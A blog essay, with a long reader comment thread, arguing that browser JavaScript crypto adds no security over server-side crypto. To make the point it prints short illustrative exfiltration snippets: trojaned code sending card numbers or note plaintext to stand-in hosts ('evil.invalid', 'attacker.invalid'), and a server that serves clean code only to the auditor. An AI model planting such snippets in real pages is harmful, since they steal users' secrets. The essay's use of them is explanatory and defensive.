Final post on Javascript crypto

The talk I gave last year on common crypto flaws still seems to generate comments. The majority of the discussion is by defenders of Javascript crypto. I made JS crypto a very minor part of the talk because I thought it would be obvious why it is a bad idea. Apparently, I was wrong; I underestimated the grip it has on web developers.

Rather than repeat the same rebuttals over and over, this is my final post on this subject. It ends with a challenge — if you have an application where Javascript crypto is more secure than traditional implementation approaches, post it in the comments. I’ll write a post citing you and explaining how you changed my mind. But since I expect this to be my last post on the matter, read this article carefully before posting.

To illustrate the problems with JS crypto, let’s use a simplified example application: a secure note-taker. The user writes notes to themselves that they can access from multiple computers. The notes will be encrypted by a random key, which is itself encrypted with a key derived from a passphrase. There are three implementation approaches we will consider: traditional client-side app, server-side app, and Javascript crypto. We will ignore attacks that are common to all three implementations (e.g., weak passphrase, client-side keylogger) and focus on their differences.
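
To make the scheme concrete, here is a minimal sketch of that key hierarchy using Node's crypto module. The function names and parameter choices are illustrative only and are not taken from any of the implementations discussed below: a passphrase-derived key wraps a random note key, and the random key encrypts the notes.

    const crypto = require('crypto');

    // Derive a key-encryption key from the passphrase (parameters are illustrative).
    function deriveKek(passphrase, salt) {
      return crypto.pbkdf2Sync(passphrase, salt, 100000, 32, 'sha256');
    }

    // AES-256-GCM encrypt; returns iv, ciphertext, and auth tag.
    function seal(key, plaintext) {
      const iv = crypto.randomBytes(12);
      const cipher = crypto.createCipheriv('aes-256-gcm', key, iv);
      const ct = Buffer.concat([cipher.update(plaintext), cipher.final()]);
      return { iv, ct, tag: cipher.getAuthTag() };
    }

    const salt = crypto.randomBytes(16);
    const noteKey = crypto.randomBytes(32);             // random key that encrypts the notes
    const kek = deriveKek('correct horse battery staple', salt);
    const wrappedKey = seal(kek, noteKey);               // stored on the server
    const encryptedNote = seal(noteKey, Buffer.from('my first note'));  // also stored on the server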

The traditional client-side approach offers the most security. For example, you could wrap PGP in a GUI with a notes field and store the encrypted files and key on the server. A user of the app is secure against future compromise of the server. However, they are still at risk from buggy or trojaned code each time they download it. If they are concerned about this kind of attack, they can store a local copy and have a cryptographer audit it before using it.

The main advantage of this approach is that PGP has been around for almost 20 years. It is well-tested, and the GUI author is unlikely to make a mistake in interfacing with it (especially if using GPGME). The code is open source and available for review.

If you don't want to install client-side code, a less-secure approach is a server-side app accessed via a web browser. To take advantage of existing crypto code, we'll use PGP again, but the passphrase will be sent to the server over HTTPS. The server-side code en/decrypts the notes using GPGME and pipes the results to the user.
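
As a rough sketch of what that handler could look like (illustrative only: it shells out to the gpg binary rather than calling GPGME, and the function name is invented), note that the passphrase necessarily sits in the webserver process's memory for the duration of each request:

    const { spawnSync } = require('child_process');

    // Decrypt a stored note by piping the user's passphrase to gpg on stdin.
    // Newer gpg versions may additionally need '--pinentry-mode', 'loopback'.
    function decryptNote(encryptedPath, passphrase) {
      const result = spawnSync('gpg', [
        '--batch', '--quiet',
        '--passphrase-fd', '0',   // read the passphrase from stdin
        '--decrypt', encryptedPath,
      ], { input: passphrase + '\n' });
      if (result.status !== 0) {
        throw new Error('gpg failed: ' + (result.stderr || ''));
      }
      return result.stdout;       // plaintext note, returned to the user over HTTPS
    }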

Compared to client-side code, there are a number of obvious weaknesses. The passphrase can be grabbed from the memory of the webserver process each time it is entered. The PGP code can be trojaned, possibly in a subtle way. The server’s /dev/urandom can be biased, weakening any keys generated there.

The most important difference from a client-side attack is that it takes effect immediately. An attacker who trojans a client app has to wait until users download and start using it. The attacker can copy the ciphertext from the server, but it isn't readable until a user runs the trojaned client and exposes a passphrase or key. However, a server-side trojan takes effect immediately, and all users who access their notes during this period are compromised.

Another difference is that the passphrase is exposed to a longer chain of software. With a client-side app, the passphrase is entered into the GUI app and passed over local IPC to PGP. It can be wiped from RAM after use, protected from being swapped to disk via mlock(), and generally remains under the user's control. With the server-side app, it is entered into a web browser (which can cache it), sent over HTTPS (which involves trusting hundreds of CAs and a complex software stack), hits a webserver, and is finally passed over local IPC to PGP. A compromise of any component of that chain exposes the passphrase.

The last difference is that the user cannot audit the server to see if an attack has occurred. With client-side code, the user can take charge of change management, refusing to update to new code until it can be audited. With a transport-level attack (e.g., sslstrip), there is nothing to audit after the fact.

The final implementation approach is Javascript crypto. The trust model is similar to server-side crypto except the code executes in the user’s browser instead of on the server. For our note-taker app, the browser would receive a JS crypto library over HTTPS. The first time it is used, it generates the user’s encryption key and encrypts it with the passphrase (say, derived via PBKDF2). This encrypted key is persisted on the server. The notes files are en/decrypted by the JS code before being sent to the server.

Javascript crypto has all the same disadvantages as server-side crypto, plus more. A slightly modified version of all the server-side attacks still works. Instead of trojaning the server app, an attacker can trojan the JS that is sent to the user. Any changes to the code immediately take effect for all active users. There's the same long chain of software having access to critical data (the JS code and the passphrase processed by it).

So what additional problems make JS crypto worse than the server-side approach?

  1. Numerous libraries not maintained by cryptographers — With a little searching, I found: clipperz, etherhack, Titaniumcore, Dojo, crypto-js, jsSHA, jscryptolib, pidCrypt, van Everdingen's library, and Movable Type's AES. None of them is written or maintained by cryptographers. One exception is Stanford SJCL, although that was written by grad students only 6 months ago, so it's too soon to tell how actively it will be tested and maintained.
  2. New code that has not been properly reviewed, with no clear “best practices” for implementers — the oldest library I can find is 2 years old. Major platform-level questions still need to be resolved by even the better ones.
  3. Low-level primitives only — a grab bag of AES, Serpent, RC4, and Caesar ciphers (yes, in the same library). No high-level operations like GPGME provides. Now everyone can (and has to) be a crypto protocol designer.
  4. Browser is a low-assurance environment — the same-origin policy is not a replacement for ACLs, privilege separation, memory protection, mlock(), etc. The JS DOM allows arbitrary eval on each element, and the language allows rebinding of most operations (too much flexibility for crypto).
  5. Poor crypto support — JS has no secure PRNG such as /dev/urandom, and side channel resistance is much more difficult, if not impossible (see the sketch after this list).
  6. Too many platforms — IE, Firefox, Netscape, Opera, WebKit, Konqueror, and all versions of each. Crypto code tends to fail catastrophically in the face of platform bugs.
  7. Auditability — each user is served a potentially differing copy of the code. Old code may be running due to browser cache issues. Impossible for server maintainers to audit clients.
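
On point 5, the fallback a library author reaches for in the absence of /dev/urandom tends to look something like the following (an illustrative anti-example, not code from any particular library). Math.random() is not a cryptographic PRNG: it is seeded with little entropy and is not designed to resist prediction of its past or future outputs.

    // DO NOT use this for keys: Math.random() is the typical "entropy" source in browser JS.
    function insecureRandomKey(numBytes) {
      var key = [];
      for (var i = 0; i < numBytes; i++) {
        // Predictable to an attacker who can model or reseed the engine's generator.
        key.push(Math.floor(Math.random() * 256));
      }
      return key;
    }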

JS crypto is not even better for client-side auditability. Since JS is quite lenient in allowing page elements to rebind DOM nodes, even “View Source” does not reveal the actual code running in the browser. You’re only as secure as the worst script run from a given page or any other pages it allows via document.domain.

I have only heard of one application of JS crypto that made sense, but it wasn’t from a security perspective. A web firm processes credit card numbers. For cost reasons, they wanted to avoid PCI audits of their webservers, but PCI required any server that handled plaintext credit card numbers to be audited. So, their webservers send a JS crypto app to the browser client to encrypt the credit card number with an RSA public key. The corresponding private key is accessible only to the backend database. So based on the wording of PCI, only the database server requires an audit.

Of course, this is a ludicrous argument from a security perspective. The webserver is a critical part of the chain of trust in protecting the credit card numbers. There are many subtle ways to trojan RSA encryption code to disclose the plaintext. To detect trojans, the web firm has a client machine that repeatedly downloads and checksums the JS code from each webserver. But an attacker can serve the original JS to that machine while sending trojaned code to other users.
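
To make the targeting problem concrete, here is a hedged sketch of why the checksumming client proves nothing (the server code, address, and payloads are invented for illustration): the webserver can simply fingerprint the auditor and serve it the clean copy.

    const http = require('http');

    const CLEAN_JS    = 'function encryptCard(pan, pubKey) { /* honest RSA encryption */ }';
    const TROJANED_JS = 'function encryptCard(pan, pubKey) { new Image().src = "//evil.invalid/?" + pan; /* ...then encrypt honestly */ }';
    const AUDITOR_IP  = '198.51.100.7';   // hypothetical address of the checksumming client

    http.createServer((req, res) => {
      res.setHeader('Content-Type', 'application/javascript');
      // The auditor always sees code that matches its checksum; everyone else gets the backdoor.
      res.end(req.socket.remoteAddress === AUDITOR_IP ? CLEAN_JS : TROJANED_JS);
    }).listen(8080);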

While I agree this is a clever way to avoid PCI audits, it does not increase actual security in any way. It is still subject to the above drawbacks of JS crypto.

If you’ve read this article and still think JS crypto has security advantages over server-side crypto for some particular application, describe it in a comment below. But the burden of proof is on you to explain why the above list of drawbacks is addressed or not relevant to your system. Until then, I am certain JS crypto does not make security sense.

Just because something can be done doesn’t mean it should be.

Epilogue

Auditability of client-side Javascript

I had overstated the auditability of JS in the browser environment by saying the code was accessible via “View Source”. It turns out the browser environment is even more malleable than I first thought. There is no user-accessible menu that tells what code is actually executing on a given page since DOM events can cause rebinding of page elements, including your crypto code. Thanks to Thomas Ptacek for pointing this out. I updated the corresponding paragraph above.

JS libraries such as jQuery, Prototype, and YUI all have APIs for loading additional page elements, which can be HTML or JS. These elements can rebind DOM nodes, meaning each AJAX query can result in the code of a page changing, not just the data displayed. The APIs don’t make a special effort to filter out page elements, and instead trust that you know what you’re doing.
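
As a concrete illustration of that rebinding (the function name here is invented; assume the page's crypto library exposed it globally), any script that runs later on the page can silently wrap the "audited" code, and View Source will still show the original:

    // Hypothetical: the page's crypto library exposed window.encryptNote.
    (function () {
      var original = window.encryptNote;
      window.encryptNote = function (plaintext, key) {
        // Exfiltrate the plaintext, then behave normally so nothing looks wrong.
        new Image().src = 'https://attacker.invalid/steal?p=' + encodeURIComponent(plaintext);
        return original(plaintext, key);
      };
    })();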

The same origin policy is the only protection against this modification. However, this policy is applied at the page level, not script level. So if any script on a given page sets document.domain to a “safe” value like “example.net”, this would still allow JS code served from “ads.example.net” to override your crypto code on “www.example.net”. Your page is only as secure as the worst script loaded from it.

Brendan Eich made an informative comment on how document.domain is not the worst issue; the real problem is the lack of privilege separation for cross-site scripts:

Scripts can be sourced cross-site, so you could get jacked without document.domain entering the picture just by <script src="evil.ads.com">. This threat is real but it is independent of document.domain and it doesn’t make document.domain more hazardous. It does not matter where the scripts come from. They need not come from ads.example.net — if http://www.example.net HTML loads them, they’re #include’d into http://www.example.net’s origin (whether it has been modified by document.domain or not).

In other words, if you have communicating pages that set document.domain to join a common superdomain, they have to be as careful with cross-site scripts as a single page loaded from that superdomain would. This suggests that document.domain is not the problem — cross-site scripts having full rights is the problem. See my W2SP 2009 slides.

“Proof of work” systems

Daniel Franke suggested one potentially-useful application for JS crypto: “proof of work” systems. These systems require the client to compute some difficult function to increase the effort required to send spam, cause denial of service, or bruteforce passwords. While I agree this application would not be subject to the security flaws listed in this article, it would have other problems.
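
For reference, here is a minimal hashcash-style sketch of the shape such a work function usually takes (a commenter below describes essentially the same construction); the parameter choices are arbitrary and this is illustration, not a recommendation. It is sketched in Node for brevity; in the browser, the hash itself would have to come from one of the JS libraries discussed above. The client searches for a nonce whose hash has enough leading zero bits, and the server verifies with a single hash.

    const crypto = require('crypto');

    // Count the leading zero bits of a hex digest.
    function leadingZeroBits(hex) {
      let bits = 0;
      for (const ch of hex) {
        const v = parseInt(ch, 16);
        if (v === 0) { bits += 4; continue; }
        bits += Math.clz32(v) - 28;   // clz32 counts from bit 31; a hex digit uses bits 0-3
        break;
      }
      return bits;
    }

    // Client: find a nonce so that SHA-1(challenge:nonce) has at least `difficulty` leading zero bits.
    function proveWork(challenge, difficulty) {
      for (let nonce = 0; ; nonce++) {
        const digest = crypto.createHash('sha1').update(challenge + ':' + nonce).digest('hex');
        if (leadingZeroBits(digest) >= difficulty) return nonce;
      }
    }

    // Server: a single hash checks the claimed nonce.
    function checkWork(challenge, nonce, difficulty) {
      const digest = crypto.createHash('sha1').update(challenge + ':' + nonce).digest('hex');
      return leadingZeroBits(digest) >= difficulty;
    }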

Javascript is many times slower than native code and much worse for crypto functions than general computation. This means the advantage an attacker has in creating a native C plus GPU execution environment will likely far outstrip any slowness legitimate users will accept. If the performance ratio between attacker and legitimate users is too great, Javascript can’t be used for this purpose.

He recognized this problem and also suggested two ways to address it: increase the difficulty of the work function only when an attack is going on or only for guesses with weak passphrases. The problem with the first is that an attacker can scale up their guessing rate until the server slows down and then stay just below that threshold. Additionally, she can parallelize guesses for multiple users, depending on what the server uses for rate-limiting. One problem with the second is that it adds a round-trip: the server has to see the guess (to judge its strength) before selecting a difficulty for the proof-of-work function. In general, it’s better to select a one-size-fits-all parameter than to try to scale it dynamically.

Browser plugin can checksum JS crypto code

This idea helps my argument, not hurts it. If you can deploy a custom plugin to clients, why not run the crypto there? If it can access the host environment, it has a real PRNG, crypto library (Mozilla NSS or Microsoft CryptoAPI), etc. Because of Javascript’s dynamism, no one knows a secure way to verify signatures on all page elements and DOM updates, so a checksumming plugin would not live up to its promise.

132 thoughts on "Final post on Javascript crypto"

  1. Hello,

    Of course, I don’t disagree with your statement. You’re summarizing the situation very well! (I’m going to tweet about your post: http://twitter.com/mruef)

    But there is one thing I don’t like. You write:

    The one thing JS crypto is potentially better at is client-side auditability. Yes, you can “View Source” every time you use the web app (…) since no one does this, the point is moot.

    Wouldn't there be a technical solution for this (checksums)? And why do you expect someone's not checking the site's source code, but assume all the other security and audit measures (although they might be economically insufficient)?

    Regards,

    Marc

  2. I can think of one legitimate use for JS crypto, and it’s the one thing I’ve never actually seen it used for: cryptographic proof-of-work as mitigation against online dictionary attacks.

    There are two usual ways to prevent online dictionary attacks: CAPTCHAs, and lockout after N incorrect tries. AIs are getting better and better at breaking CAPTCHAs, and lockout, even if temporary, is inherently a DoS vulnerability.

    However, you can use JS to submit a cryptographic proof of work along with every login attempt. During attacks, the server can dynamically scale the amount of required work in proportion to how quickly attempts are being made. That way, rather than a hard lockout, the worst that can happen is that legitimate users have to wait a while before logging in — and things go back to normal as soon as the attack is over.

    The downside here is that users have to compute their PoW in JS, while attackers get to use C and CUDA. But at least this gap is getting narrower as JS interpreters improve, and the math works out pretty well already. If an adversary has 1000x the computational resources as the user under attack, and that user’s password is 6 random lower-case letters, and the server forces the user to spend 1 minute computing PoW, then that password can be expected to hold out for almost a year. By which time a server admin will hopefully have intervened to shut down the attack.

    One cute optimization would be to require less work when submitting a strong password than when submitting a weak one. A user with a random 20-character password doesn’t have to worry about dictionary attacks anyway, so why make him wait to log in just because some schmuck is trying to break into Fort Knox by beating his head against the front door?

    1. I’ve thought about Javascript proof-of-work protocols before, but I’ve had trouble finding anything that actually works. In particular, classical cryptographic code – with its heavy reliance on uint32’s and everything that implies – tends to run painfully slowly. Something like Dwork, Goldberg and Naor’s “On Memory-Bound Functions for Fighting Spam” seems a better idea (JS may be computationally slow, but if the memory overhead is modest it should be able to keep up with C on memory-bound functions – at least before you consider multicore, NUMA and other such niceties) but requires a rather large amount of data. One could try to generate this data client-side with a PRG, but then you need to be sure that one cannot efficiently “seek” in the output of the PRG even when the key is known…

      1. Adding to my own comment: there are actual Javascript proof of work systems. They are either based on obfuscation of the Javascript or run ridiculously slowly (so slowly that a C program on a typical home computer would be constrained by bandwidth before CPU time, I’d guess).

    2. He recognized this problem and also suggested two ways to address it: increase the difficulty of the work function only when an attack is going on or only for users with weak passphrases. The problem with the first is that an attacker can scale up their guessing rate until the server slows down and then stay just below that threshold. Additionally, she can open many parallel connections and split guesses among them. The problem with the second is that an attacker can walk through the username list, looking for the hardest work function. That user has the weakest password and should be targeted first.

      I think you misunderstood me slightly per both these suggestions. Threshold calculation should be per account, not per connection, so parallel connections don’t buy you anything. And the amount of work required to submit a login attempt should be based on the strength of the guessed password, not the strength of the correct one, so there’s no information leak there.

      1. [For clarity: the text quoted in the comment I’m replying to has been added to the article.]

        Yes, that makes sense and sufficiently addresses the objections raised in the (edited) article.

        There are still two issues, though: I don’t know of any function which can be evaluated fast enough in Javascript (but maybe one could be found), and there are “economic” arguments against proof-of-work schemes, e.g. http://www.cl.cam.ac.uk/~rnc1/proofwork.pdf.

        Still, your proposal is at least as sensible as mine…

      2. re: parallel connections: I meant that whatever resource the server rate-limits on should be parallelized by the attacker. If it’s connections, multiple connections. If users, guess multiple user account passwords in parallel. You typically have many users to choose from and only need one success.

        re: delay based on guessed password strength: It wasn’t clear you were saying this. It still doesn’t look like that would work because the server would have to see the password guess first, then send a corresponding strength proof-of-work code to the client to resubmit. This adds round trips to the protocol.

      3. [In response to Nate:]

        Non-interactive proof-of-work protocols are doable. Calculate some form of complexity (say length * log(smallest reasonable class containing all password characters)) and require an N-byte string s such that SHA1(s || url of form || input to form || timestamp) starts with a given number of zeroes – this is what hashcash does. Increase the number of zeroes you require when there are too many logins for a given account. This can also be done interactively: the server accepts the first proof of work, and rejects the next with “try again, for x more zeroes this time” (this can be transparent to the user).

        Even if your amount of work requested is hard to “scale” in this fashion, telling the client to “try again” is not that unreasonable – provided there’s an upper limit to the amount of additional work required, no client can ever be completely locked out of an account, and the “try again” message should only appear when under attack.

        I agree that slowing down logins for all users may be necessary (e.g. when a sufficient number of failed login attempts are registered at different accounts.) This is undesirable, but acceptable.

      4. Joachim, that seems reasonable, as long as your timestamp is unique (e.g., is not month/year, cannot be reset back to a previous time, timestamps in the future are not accepted, etc.) Otherwise the attacker can replay.

        Since it is non-interactive, an attacker can pre-calculate a whole batch of these before beginning the attack. It is critical that “input to form” include the username as well as password guess, that way the proof-of-work is bound to that one account only.

  3. To address your list of problems with respect to this use case: 4 through 7 don’t matter, because the JS crypto code isn’t handling any secrets. 1 through 3 still apply, but you’re reversing cause and effect. It’s not that JS crypto is bad because there are no good implementations. It’s that there are no good implementations because anyone smart enough to write one is smart enough to know that it’s a bad idea to begin with. As soon as a use case comes along to make it worthwhile, someone will solve the implementation problem, and it only has to be solved once.

  4. This is a straw-man argument. In your example of the secure note-taker, adding JS crypto clearly doesn’t add anything but complexity. But it’s a long way to go from there to the idea that crypto in JS could never be useful.

    At the very least, there are lots of uses of JS outside the traditional server/browser model. These include node.js, browser extensions, bookmarklets, downloadable HTML/JS apps, database query languages, and so on. Javascript is a general-purpose language these days; you can’t just dismiss JS crypto on the basis of quirks in the security model of one application.

    More generally, your argument seems to be that because the trust of JS crypto ultimately derives from the source of the JS (ie, the server), encrypting something client-side and sending it back to the server doesn’t add very much. But that’s not the only thing that the browser can do with encrypted data. Data can be persisted to disk, either as cookies or stored in an HTML5 DB; data can be passed to 3rd party servers using XMLHttpRequests or WebSockets; data can be deserialized and decrypted from a JSONP callback; and so on.

    As to the quality of available libraries — I agree that the best projects are still pretty young. But it’s worth pointing out that Google’s Closure library (the JS behind Gmail, Reader, Google Maps, etc) contains a couple crypto primitives… I have no idea what they’re used for in practice, but that code base is certainly one of the best-maintained and best-reviewed (by Google employees at least) Javascript code bases anywhere.

    Anyway; just making the counter-argument. I certainly agree with your basic point that it’s easy to get JS crypto wrong — or even that *most* uses are wrong. But that doesn’t mean that good uses are impossible to imagine.

    -sq

      1. you can run node.js in the client. the line between client and server is very, very murky and getting murkier all the time. people are running browser (client) engines on servers. if you aren't careful you'll miss this transition. i'm personally aware of a project at a certain internet giant whose aim is to change the way the internet works – specifically with respect to the arbitrary line between code and data. the solution of securely moving code around the internet, which huge government grid computing projects have been working on for decades, is right in front of our eyes.

    1. This article is clearly about client-side browser JS, its environment, and trust model. It is not a complaint about the core language itself or an alternate environment like Node.js. That being said, some of the environments you describe (bookmarklets) suffer from the same flaws described in points 1-7.

      All of the things you describe that can be done with the data (local storage, posting via XMLHttpRequest) do not address the arguments made in points 1-7. The root of trust is the server because the JS code is downloaded from there. What it does with the data after en/decrypting it makes no difference to this fact.

  5. The other place it makes sense to use JS crypto is opportunistically where it would not otherwise be used. SSL provides the “right” way to encrypt logins for large websites, but there is a great deal of code deployed on the web that will never use SSL for a variety of reasons, inexperience of the webmasters being the prime reason. WordPress is a good example. If javascript can be used to improve security of those applications by hashing the login information so that it is not vulnerable to simple sniffing, the overall security of the web is improved.

    1. Similarly, the staircase in my living room is failing badly, and the contractor told me it will cost many thousands of dollars to completely rebuild (since the original was built badly). Therefore, I am going to repaint.

      There are rare cases where “a little better than awful” is as reasonable an answer as “correct”, but those cases almost never involve user safety. Javascript isn’t improving the security of applications where it’s used to hash login information that isn’t being sent over SSL; it’s simply making the exploit more fun to write. In this case: without SSL delivery of the login page, there’s no way to prevent an attacker from simply inserting a script tag into the DOM that spirits away login information. What was the point?

      1. actually, i think an honest look at the security/privacy mechanisms provided by today’s tools *precisely* describes a case where ‘a little better than awful’ would be preferred. my mother emailed me some bank account information just last week. there isn’t *any* exploit required there. security software experts have failed horribly to provide tools that actual living breathing human beings might use and this is why most of them have just given up and use hotmail.

        i personally find it astounding that the kind of people who will deny this probably have an actual brand new credit card sitting in their unlocked mailbox and feel perfectly comfortable with this fact.

        your information's security is only as strong as its weakest link. this includes the locks on your home, your mailbox, and the granularity you shred your trash with.

    1. If your users have to install a plugin anyway, why not do the crypto in the plugin? (No, “this could be reused for other sites” is not an argument – a) it won’t be, and b) so can my “crypto plugin”.)

    2. Cortesi’s concept is silly. It seeks to find — through trial and inevitable error — the bare minimum kernel of functionality a browser needs to bolt on to make it theoretically possible to safely deploy crypto in a browser. Whether or not he eventually identifies that functionality, he hasn’t addressed any of the problems that make it hard to get cryptography right in a browser. Cryptography is hard enough in native clientside code. The minimum viable crypto kernel required to implement it in a harder environment just isn’t valuable.

      If clientside browser crypto was valuable (and maybe it is), why wouldn’t we just standardize on PGP and provide standard JS bindings to a native browser PGP module? PGP works.

      1. I like this. If there was a standard JS wrapper around PGP with your keyring stored securely in local storage, I would support use of JS crypto. Not until then.

      2. Or at least expose a subset of their native crypto libs through a JS binding. For instance, looking at how they currently implement bookmark synchronization: both Chrome and Firefox use native crypto primitives. While everything is done in C++ in Chrome, Firefox has developed an extension that binds NSS primitives and is called from their JS extension code.

      3. That’s an interesting idea.

        Of course, my browser – the most insecure piece of software I run – will have to pry access to my PGP key from my cold, dead hands. *Especially* if it’s accessible from Javascript. How long before Mozilla or Microsoft does something stupid and allows anyone to sign any document with my key, or just discloses it completely?

      4. Seb, while I like the idea of JS having native bindings (e.g. to Mozilla NSS), I think those libraries are too low-level and something with the application-level behavior of PGP is more desirable.

  6. I have 3 comments/ideas about your post:

    1. I think there is/used to be checksum support in HTTP (Content-MD5 – yes, yes, I know MD5 is broken, it’s just an example). If the browser supported it (I don’t think there is one that does at the moment) and there was a GUI which I could use to verify that the source code I downloaded is the same as last time (or something like that), then it might be useful.

    2. I once built an application where I wanted cryptography in a web browser. It was a chat application, where messages pass from browser to server to the browser of the person I wanted to have a conversation with. The crypto was there to guarantee privacy. I wanted to create a chat application which could establish a real secure connection between 2 people which was guaranteed to be private. Obviously you can’t have it rely on the server to do the crypto. It used Diffie-Hellman key exchange so that both sides could establish the same private key.

    I never finished it because I’ve never figured out how I could be 100% certain who I was talking to. And I knew that I don’t know good crypto (it was a learning experience/project about crypto) and browsers don’t have a good random-number generator.

    3. A different way to do crypto in the browser, instead of an API, could be to have crypto-enabled textareas, with some extra GUI elements to help it along. A simple application could be in webmail, where the browser would sign or encrypt your message before you send the message to the server. The browser can provide all the normal guarantees any other normal fat client does and not let any javascript get to the cleartext.

    PS English is not my first language.

    1. 1. Even if that actually worked, users have no way of distinguishing a legit version bump from a trojan. Read up on “malicious cryptography” for some examples. Also, MD5 is insecure.

      2. Your gut reaction is correct. Your system effectively would have been relying on the “server to do the crypto”, just with delayed execution in the browser environment. You’re right there is no secure PRNG available.

      3. Key management would still be hard (establishing identity).

  7. Good article, and I basically agree with your conclusions about Javascript crypto, at least in web browsers.

    However, you say that “With client-side code, the user can take charge of change management, refusing to update to new code until it can be audited.”

    That hypothetical advantage of client-side code is not true in practice. Most client-side operating systems run code with the full privileges of its invoking user, allowing any app (or code that it runs or is exploited by) to interfere with any other app. And many applications have automatic update mechanisms that don’t really leave the user in control, or able to audit the code that they are running (or to rely on someone else’s audit and know that they are running the same code).

  8. Maybe I should add, crypto in the browser (other than for transport encryption) can be useful where your data was already encrypted, the webserver only handles encrypted data, and the user has the key.

    For example, I’ve seen a remote backup service where a fat client encrypts the data and uploads it to the server. When a user needs to retrieve a file, they could log in with a browser and download an encrypted file which had the file list. In the ‘browser’ it decoded the list, asked the user what file or file part they wanted to retrieve, and asked the server for that part.

    The most obvious flaw in their implementation was they used a Java-applet, nice try, but we don’t know where the data goes after it was decrypted so that was useless.

    But if the browser had a properly checked crypto library built in and the right GUI, and made it so the code in the page doesn’t get access to the plaintext or keys (and we keep pages/domains separate in different processes like in Chrome, etc. etc. :-) ), then we could actually build these things properly.

    1. The “proper” way to build a secure backup system with a requirement that the server never be able to read the client’s content is for the client’s browser to entirely trust that the server, and the channel between the server and the client, are delivering safe encryption code?

      1. Sorry, but I don’t think I understand what you said.

        The idea was to have the server just hold encrypted data.

        When the user wants to retrieve a file, the browser would ask the server for the file and decode it with a user specified key.

      2. “Yes, but where does the browser get the code that implements the decryption process? That’s my main point about trusting the server.”

        Nate, it should just use standard encryption methods which are included in the browser. Javascript just gets the encrypted data from the server. And the browser should have a GUI which can be used to ask the user for the key to decrypt the data.

        I think decoding a message could be done with a special textarea and handling files could be done by adapting the HTML5 file API: http://www.thebuzzmedia.com/html5-drag-and-drop-and-file-api-tutorial/

        In this case Javascript is just glue handling encrypted data which came from the server.

      3. Lennie: What should just use standard encryption methods which are included in the browser? (Most browsers don’t include JS-accessible crypto libraries, but that might change if someone found a use for them.)

    2. Hi Joachim,

      Simplest example would be PGP for webmail.

      Let’s say you use, for example, gmail; people do and will keep doing so for some strange reason. It looks like it might even be increasing, with people moving their stuff ‘into the cloud’. So you have a need to use PGP to sign or encrypt your messages when communicating with some people. How would you do this?

      It looks like there is already an extension called FireGPG for that (never tried it), but would it not be better to have it in the browser so it works with any webmail or other messaging system and the code is checked by people who understand encryption?

      1. That might be marginally useful, yes. Of course, doing it server-side a la hushmail has quite a few advantages (e.g. in usability), and if you want to do it properly you’ll need a local mail client anyway…

      2. “if you want to do it properly you’ll need a local mail client anyway”

        OK, I’ll bite. Why? Because you have 2 browsers, both have PGP keys and can send PGP-encrypted messages to each other, through the email system (in this case with the use of webmail).

        If you say, well the javascript-code in the page could send your encrypted message to someone else as well or could let someone else know those 2 persons are communicating.

        So does the current email-system.

        I’d love to know how a mail client is safer.

      3. I’ll admit: assuming the browser is as secure as your local mail client (probably not true even if you’re using Outlook), this may not be worse, security-wise, than a local mail client. That said, if you want to do Javascript crypto you’ll be in trouble:

        If Javascript can be used to make signatures or decrypt messages, you need to trust your webmail provider not to fake messages on your behalf or read your mail. If Javascript can be used to verify signatures or encrypt messages, you have an information leak (so, you, an employee of the DoD, have Assange’s key, eh? Interesting…). If Javascript can read the textarea on which you want to apply encryption, your webmail provider can read your plaintext.

        In fact, you don’t want to use a textarea at all, as people will have difficulty telling a non-Javascript-accessible textarea from a normal one (you can put an icon in the browser chrome to signal “you’re typing into a secure textarea” – but people won’t check that, and there’s lots of things that can go wrong.) Obviously, either an alternative to a textarea or a non-JS-accessible textarea breaks rich text editors, on-page spellcheckers etc.

        So you need to add extra dialogs (“encrypt, sign and paste the following text”), and essentially prohibit Javascript from interacting with your plugin at all. Once you’ve done this, you’ve built a clientside native application that’s rather badly integrated into your browser – which is probably the most insecure piece of software on your system, not a good place to store your keys!

        This could work. But by the time you’ve done all of the above, there’s no Javascript in your crypto anymore, and I don’t really see any advantage over a native mail client either.

      4. Joachim, I think it shouldn’t be a plugin. That’s my point. If there is an HTML5 standard (or whatever) which the browser supports, it would give many more possibilities.

        Chromium, Firefox, and WebKit are all open source; they can be properly checked by people who know crypto, thus making it as secure as SSL is now (you could argue that the multi-CA model isn’t secure to begin with and we need DNSSEC to solve it, but that is a whole different problem).

        And you can use it not just for mail, but many other things.

        For example, I’m pretty sure Google Chrome OS won’t come with a separate mail client. Maybe PGP users are not their target audience, but still, why shouldn’t they be?

      5. I don’t see how any of the issues I pointed out would be solved by building this into the browser. I wasn’t arguing that you shouldn’t implement PGP in on-page Javascript (although you shouldn’t); I was arguing that allowing Javascript to interact with this functionality, no matter how the functionality is implemented, is a bad idea. And that any in-browser implementation would be clunky or insecure or both.

  9. @David-Sarah you can’t mess with a web application from other apps, unless you install a browser add-on that does that. As far as “the outside” (system) goes, browsers are pretty secure. I think the danger is on the net itself.

    To avoid someone tampering with your scripts, you could serve checksum code from a separate server with hardened security (no need for a full web server stack on it). You’d have to hack both to do anything.

    1. I think there is some confusion about my comment, which applies to all client-side code that is run with the privileges of the invoking user: web browsers, other client-side applications, document macros, etc. Web scripts would not be in that category if, for the sake of argument, browsers were bug-free.

      However, I’m genuinely astonished that anyone would claim that web browsers are “pretty secure”. (No, I’m not just feigning astonishment for rhetorical effect.)

      Re: “you can’t mess with a web application from other [web] apps”. Yes you can, if you can find an injection or XSRF vulnerability in the site (thereby bypassing the same-origin restrictions), or any vulnerability in the browser or any of its plug-ins. That’s far too large an attack surface for the assumption that there are no such vulnerabilities to be reasonable.

      1. I forgot to mention “or if the web app is served by an insecure protocol; or if it is served by HTTPS and (the user clicks past the cert warning that they have been systematically trained to click past, or any root CA is compromised)”.

      2. do you regularly audit the code your system installed when it prompts you to upgrade? do you check the dlls it downloads? do you make sure DNS isn’t compromised before accepting?

        it’s absolutely crazy to me that people think running code in the browser from a server is somehow fundamentally different than running code from the internet in general, including system and third party software upgrades.

        i'm speaking of the general case here – my mother will click 'yes, install latest version' no matter what pops up on her screen. unless you have some magic system that lets people run software without installing components from the internet then please don't suggest that only the browser and javascript are subject to this problem – pretty much every piece of software on every operating system has this same vulnerability.

        check the gnupg security updates log if you doubt this. then consider how you audit the versions of all the people you share secrets with who use this system.

        hint: you don’t.

      3. Did you actually read the post you’re commenting on? It was carefully arranged as a progression from server-side to client-side Javascript crypto. Server-side is the same trust model as client-side. However, there are other problems with client-side crypto (points 1-7).

        Why take on additional problems for no gain in the basic trust model? Answer: because JS crypto is about misleading your users or even yourself into thinking it adds something.

  10. Thanks for all the comments. Instead of saying the same thing multiple times, I have updated the post’s Epilogue section with comments on three points:

    * Auditability of client-side Javascript
